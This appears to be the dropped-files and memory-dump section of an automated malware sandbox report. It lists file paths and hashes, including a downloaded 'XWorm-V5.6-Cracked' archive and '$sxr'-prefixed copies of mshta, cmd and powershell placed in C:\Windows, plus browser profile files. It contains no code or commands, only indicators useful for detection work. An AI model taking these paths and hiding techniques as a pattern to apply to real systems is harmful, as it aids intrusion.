SHA256 e2b78754d352f427c6c6bb2db112d7dece9ec8bc53cb2800ead4a12e58ad73ae
SHA512 72c471c08892ae54fc4215b1f7ab8b2a71dfc3a3cc04a15f805e7a5af2c940782bf14576555205aaa50468cb5482a422bddd12cf586ccdcb8ff6700d4a11502d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 8ccd71577134f2519f3ad71be0540156
SHA1 b3e1033c4e41943c155805a2ca71b0403ca78feb
SHA256 b84aaa1e80d917325dc6837adc9b0e0cb03d8382f449a698959cc8ae1bd1ef36
SHA512 f9679eb4a2b2f27f0326a8cfc6a72ea693d9115166de56b84a3791bed4df51c982e33e4a537e0242f83067de22d69bce03d66f7f6012b17d889b8c58ba7f6d6e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00001f

MD5 a9ed0f3a37bc313d7df62e595ca1ce2d
SHA1 3cd166ea5f37f3f645ebf7ee064057f7cd013eef
SHA256 3a44f7be6fcf889e508b789374c0fe29344dc6fa7a25348083888f7c98f0c57a
SHA512 6631523a8bd34ec39c69b2361c2192abfa998bea86d8690f0f5d25124b1ea4cbbef0e1d406b0afeffa5be537b9c75154fe7710c80650d9885ba81a444a30a5ac

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00001e

MD5 e1f8c1a199ca38a7811716335fb94d43
SHA1 e35ea248cba54eb9830c06268004848400461164
SHA256 78f0f79cdd0e79a9fba9b367697255425b78da4364dc522bc59a3ce65fe95a6c
SHA512 12310f32ee77701c1e3491325a843d938c792f42bfdbbc599fe4b2f6703f5fe6588fbcd58a6a2d519050fc9ef53619e2e35dfadcbda4b218df8a912a59a5381a

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000020

MD5 e1831f8fadccd3ffa076214089522cea
SHA1 10acd26c218ff1bbbe6ac785eab5485045f61881
SHA256 9b9a4a9191b023df1aa66258eb19fc64ae5356cfc97a9dda258c6cc8ba1059ac
SHA512 372c486ac381358cc301f32cd89b7a05da7380c03fa524147c2ddf3f5e23f9b57c17485aaedc85b413461a879afc42e729547b0c96c26c49bbdb7301cd064298

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000026

MD5 efe81e4daef615b00dbe73ce495ca572
SHA1 efa6284b26573a32770851c3ccfc54de3d6642d2
SHA256 8a2115d91ed4df1f74c0bff1d7800c6c776fed3addf7e6ce4637a1bd0c9f81be
SHA512 a561f8475dc2ec744dad499bfdb45b5c113a216d93c3873321e9fbbf22dfdde932af4dedd5819f4f4e0c8bd614efb77e68825561aaf05ec69c19df6eb7271b06

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 3e0d23db398240a8634ad5e51fa85cc1
SHA1 678bb29b97294c8eff8e11dfddbae939a67f5de6
SHA256 297c41067440bcee55012873848507a58a7462551419a8168a8ff569bbcd87b2
SHA512 68e63c64f1b09186ce92841e77c84aca6b6215848e515baeed4c3803b72071c91ba65f54a548d25e93c7350c6dcd01477b9c3154674e43dc34c296605ac95afd

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 b40b9978bb789f691e834ef75bc07bee
SHA1 1757df6b999d0220c1062f44eef7df7ef608e7cc
SHA256 85ce79e37a3edaa369ef160014caeb0a18661aa68f380fd63c79c304654b1ff0
SHA512 cd2557555dc0f2ec72382d0ea826ede2f4cf518a0dce28e1808b657369815ece9cab2e61d9f4bf2d27e10bac67f76973ec93732b82658d3012bfe13ddf3bb6f8

C:\Users\Admin\Downloads\XWorm-V5.6-Cracked-main.zip

MD5 a7a9365b4303cc26d81edf194af64c72
SHA1 8f9d394c3248e3ec153eeaea7c8f3a7a611cc7d2
SHA256 edb12c68df069f50d745fe2b02f31f623c69605d36278b737c801ccc46088db0
SHA512 87ec06f8b095e9e2c9b2e475b8137bd3beeb084e59a7e2d184a1609b3408baf572d8297b39431f20c6010ba938ff38c17a4c7f4967ec56b24052b3870fcb0e5f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 a7e1795abf78a4344fe419eaf73655bf
SHA1 a7881201916c37a626b03b9eea817d186fa42a1b
SHA256 d10c7aa3c37fb00f94e78f4a0de755ba9984aa17dc7352c397e5edffd42edaf8
SHA512 89ee4cc6db57268742c31b605aa1070aa823c5ef5478e91c4b7ec0a3814e72aaf7f5bb0d7c27b2ad80a9009a00cbaaa20f79f9c3987f27789bdc8aed70e047dc

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 0bc75583bce0b502863968a15cdeec51
SHA1 83533e97b10ff41588669c46eeba86bbd7b081af
SHA256 9bbf865019cad49420d200c13254fb18b38e0649c7e7dda36807fa6cef6f06f1
SHA512 d22883fd1c342b5d62b970c19def994c991ebb9d186b5c822a1f7e208397d1f6b6a97b2564cb5259584f1aae9a7c8c78a7b76cae4c4488eb477082209b0905cc

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 e81bb17e272ed03b02970177b23b198b
SHA1 01c94b26e4dcacb95e70128934ac4ff96756687d
SHA256 16a82272bf637f35e66e77678887cb7001c48fe8541e48250b6a7262053d0c66
SHA512 6e1fec9bd361cd716d533a498ee9dda30af1a4f67e5c008c84a24bf03ff46a96e143ae598b39bbfbe007461a75f8cd6bcdcd215cfe63fa137911ae36e36c114c

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cjdqgqzj.ycm.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3920-1540-0x000001FA7A450000-0x000001FA7A472000-memory.dmp

memory/3920-1541-0x00007FF9976D0000-0x00007FF998192000-memory.dmp

memory/3920-1542-0x000001FA7A490000-0x000001FA7A4A0000-memory.dmp

memory/3920-1543-0x000001FA7A490000-0x000001FA7A4A0000-memory.dmp

memory/3920-1544-0x000001FA7A9A0000-0x000001FA7A9E6000-memory.dmp

memory/3920-1546-0x00007FF9976D0000-0x00007FF998192000-memory.dmp

memory/3920-1547-0x000001FA7ABE0000-0x000001FA7B68C000-memory.dmp

memory/3920-1548-0x000001FA7A490000-0x000001FA7A4A0000-memory.dmp

memory/3920-1549-0x00007FF9BB7C0000-0x00007FF9BB9C9000-memory.dmp

memory/3920-1550-0x000001FA7A490000-0x000001FA7A4A0000-memory.dmp

memory/3920-1551-0x00007FF9BB7C0000-0x00007FF9BB9C9000-memory.dmp

memory/3920-1552-0x000001FA7B690000-0x000001FA7C17C000-memory.dmp

memory/3920-1554-0x000001FA7A490000-0x000001FA7A4A0000-memory.dmp

memory/3920-1553-0x00007FF9BB7C0000-0x00007FF9BB9C9000-memory.dmp

memory/3920-1555-0x00007FF9BA6C0000-0x00007FF9BA77D000-memory.dmp

memory/3920-1556-0x00007FF9BB7C0000-0x00007FF9BB9C9000-memory.dmp

memory/3920-1557-0x00007FF9BB7C0000-0x00007FF9BB9C9000-memory.dmp

memory/3920-1558-0x00007FF9BB7C0000-0x00007FF9BB9C9000-memory.dmp

memory/3920-1559-0x000001FA7C550000-0x000001FA7C64C000-memory.dmp

memory/3920-1560-0x000001FA7A960000-0x000001FA7A982000-memory.dmp

memory/3920-1561-0x000001FA7A990000-0x000001FA7A996000-memory.dmp

memory/3920-1562-0x000001FA7C650000-0x000001FA7C6AE000-memory.dmp

memory/3920-1563-0x000001FA7C6B0000-0x000001FA7C708000-memory.dmp

memory/3920-1564-0x000001FA621B0000-0x000001FA621B6000-memory.dmp

memory/3920-1565-0x000001FA7C710000-0x000001FA7C718000-memory.dmp

memory/3920-1566-0x000001FA7A980000-0x000001FA7A986000-memory.dmp

memory/3920-1567-0x000001FA7C720000-0x000001FA7C75E000-memory.dmp

memory/3920-1568-0x000001FA7C760000-0x000001FA7D38C000-memory.dmp

memory/3920-1601-0x000001FA7D390000-0x000001FA7D442000-memory.dmp

memory/3920-1612-0x000001FA7D440000-0x000001FA7D476000-memory.dmp

memory/3920-1621-0x000001FA7D480000-0x000001FA7D4D8000-memory.dmp

memory/3920-1640-0x000001FA7D8E0000-0x000001FA7D90E000-memory.dmp

memory/3920-1643-0x00007FF730D80000-0x00007FF730DEE000-memory.dmp

memory/3920-1644-0x000001FA7D910000-0x000001FA7D918000-memory.dmp

memory/3920-1645-0x0000000180000000-0x0000000180007000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 cd2915b6c860ce4b9f5edeb960f53951
SHA1 0d80d6edc67cf4509d050452ff236fe2be100284
SHA256 60e685620a51758b5480a50e2c617260ad8fc3a53bec374dffd36101e1b0f54c
SHA512 32aca86b822bca7b62e36aca12a1ad3d328c896fb7e0edd61dc7fd9291e4125198c8143419834de4a67d0a189a9afc275c7bbe1c3c505dbb2630c85a8aae4f2e

memory/3920-1657-0x00007FF9BB7C0000-0x00007FF9BB9C9000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 0642660c4b0a071d6359ffa83d310a13
SHA1 de2761c5b3bad35cd665e39ad5ca57dccdd578df
SHA256 f96b2fcedcae0284f6dacd6ff4635046708bf9d5fa8d6f53d5402c78ff727fb4
SHA512 3b90f2df302e60a08f65ccf4d61fe9865407b02ba8029b82fe98ee35f229d126efd6c9b6285c274e8bfd81979d7032678d05bf6fb063a886f47182fe5451b808

memory/3920-1673-0x00007FF9BB7C0000-0x00007FF9BB9C9000-memory.dmp

memory/3920-1674-0x00007FF996E48000-0x00007FF996E49000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 865ff0cb2d0b84a9d7ca2a3cab7bde3d
SHA1 25b7f81740e6a8a70a4ab68c35fa60f8f7339bd2
SHA256 efea5594267dfd9407f57975fe421cc921fb815a6ef06cd23e1be0867549a5c7
SHA512 ac3dcb9bc87afaa005990c7e1f4fbc68a188f35fa6b1e36cf4b3ae0fcb2a0d3d07c303840aec919cccaca767fb576c1dd93b33fc55d8a7e663b7829935e958ea

memory/3920-1693-0x00007FF9BB7C0000-0x00007FF9BB9C9000-memory.dmp

C:\Windows\$sxr-mshta.exe

MD5 356e04e106f6987a19938df67dea0b76
SHA1 f2fd7cde5f97427e497dfb07b7f682149dc896fb
SHA256 4ed8a115fa1dcfd532397b800775c1b54d2d407b52118b5423e94ff1ce855d7e
SHA512 df1c655fa3a95e001084af8c3aa97c54dbcb690210e1353dd836702cfb4af3c857449df62aa62d7ab525ffb4e0dc1552181dfcdee2c28f4af5c20df6d95811cd

C:\Windows\$sxr-cmd.exe

MD5 c5db7b712f280c3ae4f731ad7d5ea171
SHA1 e8717ff0d40e01fd3b06de2aa5a401bed1c907cc
SHA256 f6c9532e1f4b66be96f0f56bd7c3a3c1997ea8066b91bfcc984e41f072c347ba
SHA512 bceaf7dc30f2c99b40b7025a5eb063f3131a1ef9349fdf356720eaef838bcf58ce3d5e3bad9459ddd2f872df430bdb66a766a5acff5d3bbc738eba8945cb0a89

C:\Windows\$sxr-powershell.exe

MD5 0e9ccd796e251916133392539572a374
SHA1 eee0b7e9fdb295ea97c5f2e7c7ba3ac7f4085204
SHA256 c7d4e119149a7150b7101a4bd9fffbf659fba76d058f7bf6cc73c99fb36e8221
SHA512 e15c3696e2c96874242d3b0731ce0c790387ccce9a83a19634aed4d1efef72ce8b8fa683069950d652b16cd8d5e9daae9910df6d0a75cb74fdbe90ae5186765d

memory/1480-1702-0x00007FF9976D0000-0x00007FF998192000-memory.dmp

memory/1480-1703-0x000002016E140000-0x000002016E150000-memory.dmp

memory/3920-1704-0x00007FF9BB7C0000-0x00007FF9BB9C9000-memory.dmp

memory/1480-1705-0x000002016E140000-0x000002016E150000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 e566632d8956997225be604d026c9b39
SHA1 94a9aade75fffc63ed71404b630eca41d3ce130e
SHA256 b7f66a3543488b08d8533f290eb5f2df7289531934e6db9c346714cfbf609cf0
SHA512 f244eb419eef0617cd585002e52c26120e57fcbadc37762c100712c55ff3c29b0f3991c2ffa8eefc4080d2a8dbfa01b188250ea440d631efed358e702cc3fecd

memory/1480-1715-0x000002016E140000-0x000002016E150000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 5dc9fc832f6d01a4fce22955f9387b25
SHA1 aaf8a192f8e6a4bdcc930652543578649d2b211b
SHA256 43af182632c97a6d3c7428dd27de3d068a629679642b42a7032c40a1820afa41
SHA512 9760d98e305904310efd1b0caaaa3b3c067413d3ca8148482ebc341f58c39559fafe5d92d3d8f22db61612cbcd2e8bd9881dfa4c1804d0f05d951fe7b8226376

memory/1480-1725-0x000002017E870000-0x000002017EF16000-memory.dmp

memory/1480-1727-0x00007FF9BB7C0000-0x00007FF9BB9C9000-memory.dmp

memory/1480-1728-0x00007FF9BB7C0000-0x00007FF9BB9C9000-memory.dmp

memory/1480-1729-0x000002017EF20000-0x000002017F608000-memory.dmp

memory/1480-1730-0x00007FF618E50000-0x00007FF618EBE000-memory.dmp

memory/1480-1731-0x00007FF9976D0000-0x00007FF998192000-memory.dmp

memory/1480-1732-0x00007FF9BB7C0000-0x00007FF9BB9C9000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 ca11a2921e356303fb14247eed34e0c6
SHA1 5f69a132c8fb482e4c3927ed55ae835e4098ed83
SHA256 3aa1a2b8e69f8af6f5cd13805a3dc614d3b0cb8497cd7eeb9f0fe9705e22d440
SHA512 37d966ad6fc507d89d4333375966d6904ba8b3f12e1911b3bbefba0c2d03855e0454b73a0814b003570174e36d04d9c393ff81a9bfd4a3139391752b71a38fc4

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 d70612e408e5bc63598e14023a8d421f
SHA1 9021c2456124929df1f9680e8593f80375207dde
SHA256 201527b47e05a9bc237cf03ea87b6e3d0a9c8467026b1bcabae83cfc4aeedd3e
SHA512 bdc33c7b66d09e67e012ddbd8b811b302ccbf71aa50774c90b2d8d440d987276ad8a2f2ae26961d38d32b852ca64269ba1b549b2845367880e96e85c852771e6

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 3d2fdd24509dfbb3dbd21e3424e148bf
SHA1 ceead58e505a2d6eb4c035678ca3aff809620738
SHA256 87b19ffd387db2c3be7ed1b76977768ee47e9e0b431c0f513ca135519c5c18dc
SHA512 50a0779226a457802480415ee3ae78c389d09b142572f0811bae315a7b01fe091835c2c5f3418867fffbbf5c62cdca718ab1788d0602a2dda4b5e718a1c4b484

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 32e3d5b42c306b75a10282a28a11fe14
SHA1 b68dc95f30dab18628a0a71b3c69dc6d07600448
SHA256 965e9eed4aeed799678ccb566806247653d7d237032573be7e286d346e2d003a
SHA512 a66c8d95017f6b89281ee6b3822cca18fa98531cd2ca1872f7c62f573e371ca6375e23cae9d8c873df5194ed615738f6ff6e9e2ed66abb4f07222dd086fd9be3